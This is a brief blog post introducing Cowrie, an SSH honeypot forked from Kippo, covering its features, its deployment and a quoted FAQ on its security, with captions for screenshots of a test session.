Division Zero (Div0). Copyright © 2011-2018

All rights reserved.

A Quick Glimpse at Cowrie – A SSH Honeypot

Cowrie – written by Michel Oosterhof – is a medium interaction SSH honeypot designed to log brute force attacks and shell interactions performed by the attackers. (Sounds familiar? Yes, it is a fork from Kippo).

 

The motivation of this blog post is just to have a quick glimpse into Cowrie – get a brief experience of what it’s like to handle Cowrie, and what’s the deployment process like, etc.

 

Everything you need is in the Github Repo

Michel did a very good job explaining what Cowrie is all about, how to set it up, etc. – All pretty much self-contained in the Github repo (https://github.com/micheloosterhof/cowrie).

 

Very similar to Kippo

If you’re already familiar with Kippo, you’ll be very comfortable with Cowrie. It also has many additional features on top of Kippo which I’ve yet to play with:

  • SFTP and SCP support for file upload;

  • Support for SSH exec command;

  • Logging of direct-TCP connection attempts (SSH proxying);

  • Logging in JSON format for easy processing in log management solutions; and

  • Many, many additional commands.

 

Is it secure?

Michel directed this question to the FAQ of Kippo: https://github.com/desaster/kippo/wiki/FAQ.

 

“Kippo is written in Python, and doesn’t call any external software, so it’s probably somewhat secure. Kippo has not had any real security audit done on it, and it’s definitely vulnerable to some DoS attacks (no limits on how many people can connect to it, or how many files they can download). It’s recommended to run Kippo in a well firewalled virtual machine.”

 

Conclusion

This is a really quick glimpse at Cowrie. It’s very easy to setup, and it looks very promising. I’ll do my best to find time to experiment with all the cool features written my Michel – and hopefully I’ll be able to do a more detailed write-up of Cowrie soon. So, stay tune!

 

Here’s some screenshots

 

 Running Cowrie on port 2222. ifconfig reflects the correct IP address.

 curl

 wget

 wget items remain in the fake filesystem

 

 

 

[caption id="attachment_5348" align="aligncenter" width="750"] Running Cowrie on port 2222. ifconfig reflects the correct IP address.[/caption][caption id="attachment_5347" align="aligncenter" width="800"] curl[/caption][caption id="attachment_5350" align="aligncenter" width="800"] wget[/caption][caption id="attachment_5349" align="aligncenter" width="582"] wget item remains in the fake filesystem.[/caption]

 

Tags:

Share on Facebook
Share on Twitter
Please reload

RECENT POST

September 5, 2017

Please reload

CATEGORIES
Please reload

TAGS
RSS
RSS Feed